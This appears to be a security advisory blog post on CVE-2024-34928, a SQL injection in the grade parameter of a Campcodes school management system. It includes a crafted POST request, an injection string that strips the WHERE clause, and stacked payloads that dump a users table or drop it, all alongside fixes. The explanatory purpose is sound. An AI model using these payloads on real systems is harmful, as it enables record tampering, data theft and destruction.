A new and dangerous SQL injection vulnerability (CVE-2024-34928) has been found in the Campcodes Complete Web-Based School Management System version 1. This bug could let an attacker gain unauthorized access, steal sensitive data, or tamper with records across the school management platform. In this post, we’ll break down what this vulnerability is, how it works, give you a code example, and explain how you can fix and protect yourself.

What is CVE-2024-34928?

CVE-2024-34928 is a SQL injection vulnerability in the /model/update_subject_routing.php file. The bug lets an attacker alter the SQL statement the application executes, simply by tampering with the grade parameter in a web request.

- Affected Version: 1.
- Vulnerable File: /model/update_subject_routing.php
- Vulnerable Parameter: grade
- Full CVE Reference: NVD CVE-2024-34928 (pending publication)

How The Vulnerability Works

The problem happens because the code in /model/update_subject_routing.php takes user input from the grade parameter and plugs it directly into an SQL query — without any filtering or escaping. This lets attackers “inject” malicious SQL.

Suppose update_subject_routing.php contains a snippet like the following (an illustration of the vulnerable pattern, not the vendor’s exact code):

<?php
// $conn is an already-open mysqli connection
$id = $_POST['id'];
$subject = $_POST['subject'];
$grade = $_POST['grade']; // Vulnerable parameter: never validated or escaped

// Vulnerable SQL query: the raw POST values are spliced into the SQL text
$sql = "UPDATE subject_routing SET grade='$grade' WHERE id='$id' AND subject='$subject'";
mysqli_query($conn, $sql);
?>

What’s wrong here?
The user-provided grade value is concatenated straight into the SQL statement, so a single quote in the input ends the string literal and whatever follows is parsed as SQL.

An attacker can send a crafted POST request like this (the body is shown unencoded for readability; a real request would URL-encode the quotes and spaces):

POST /model/update_subject_routing.php HTTP/1.1
Host: victim-school.edu
Content-Type: application/x-www-form-urlencoded

id=10&subject=Maths&grade=1', section='B' -- 

What happens:

The injected value closes the opening single quote of grade='...', appends attacker-chosen SQL, and then starts a comment. The query the database actually receives is

UPDATE subject_routing SET grade='1', section='B' -- ' WHERE id='10' AND subject='Maths'

Everything after `-- ` is a comment, so the original WHERE clause is thrown away. The UPDATE still runs, but now with no row filter at all: every row in subject_routing gets grade '1' and section 'B' (section is assumed here to be another column of the same table). With one request the attacker has changed a field they were never meant to touch, across every record.

Textbook payloads go further by stacking a second statement after the UPDATE, for example to read every user account (assuming a users table)

grade='; SELECT * FROM users; --

or to destroy data

grade='; DROP TABLE users; --

Two caveats matter here. First, PHP’s mysqli_query() executes only one statement per call, so stacked payloads like these fail with a syntax error against the snippet above; they only succeed where the application uses mysqli_multi_query() or another driver call that accepts several statements at once. An attacker facing a single-statement API stays inside the one UPDATE instead, for instance by writing the result of a subquery into a column they can later read back, or by using time-based tricks (such as SLEEP()) to infer data a bit at a time. Second, DROP TABLE only works if the application’s database account holds that privilege, which is exactly why the least-privilege advice below matters.

How To Fix It

1. Use Prepared Statements

Always use prepared statements so that user input travels to the database as data and never becomes part of the SQL text:

// Prepared statement: placeholders are bound as values, so a quote in $grade cannot alter the query
$stmt = $conn->prepare("UPDATE subject_routing SET grade=? WHERE id=? AND subject=?");
$stmt->bind_param('sis', $grade, $id, $subject); // s = string, i = integer
$stmt->execute();
$stmt->close();

2. Validate Input

Before using user-provided data, check on the server that it matches a strict allowlist for its field (for example, a grade should be a single letter, optionally with a + or -, or a small number) and reject the request if it does not. Validation is defence in depth; it does not replace prepared statements.

3. Update Software

Check the official Campcodes site for any patches or updates addressing this vulnerability. If none is available, apply the prepared-statement fix above to the affected file yourself.

4. Restrict Database Privileges

Limit what your web app’s database user is allowed to do. An endpoint that only updates subject_routing needs SELECT and UPDATE on the tables it touches, not DROP, ALTER or GRANT, so an injection that reaches the database cannot destroy tables or escalate further.

References

- National Vulnerability Database Listing (pending)
- Exploit Database (Campcodes) (pending)
- Campcodes Official Site
- OWASP: SQL Injection
- PHP Manual: SQL Injection Prevention

Final Thoughts

SQL injection is one of the oldest — and still most dangerous — vulnerabilities out there. CVE-2024-34928 shows that even new software can fall prey to old mistakes if developers aren’t careful with user input.

If you manage a Campcodes School Management System deployment, update and patch immediately, and never let unvalidated user input become part of your SQL queries!

Have questions or need help fixing your code? Drop a comment below or reach out to a security specialist.

Timeline

Published on: 05/23/2024 17:15:29 UTC
Last modified on: 08/02/2024 02:59:22 UTC